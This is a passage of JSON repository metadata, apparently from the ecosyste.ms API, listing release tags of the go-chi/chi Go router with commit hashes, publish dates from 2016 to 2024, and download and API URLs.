:"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url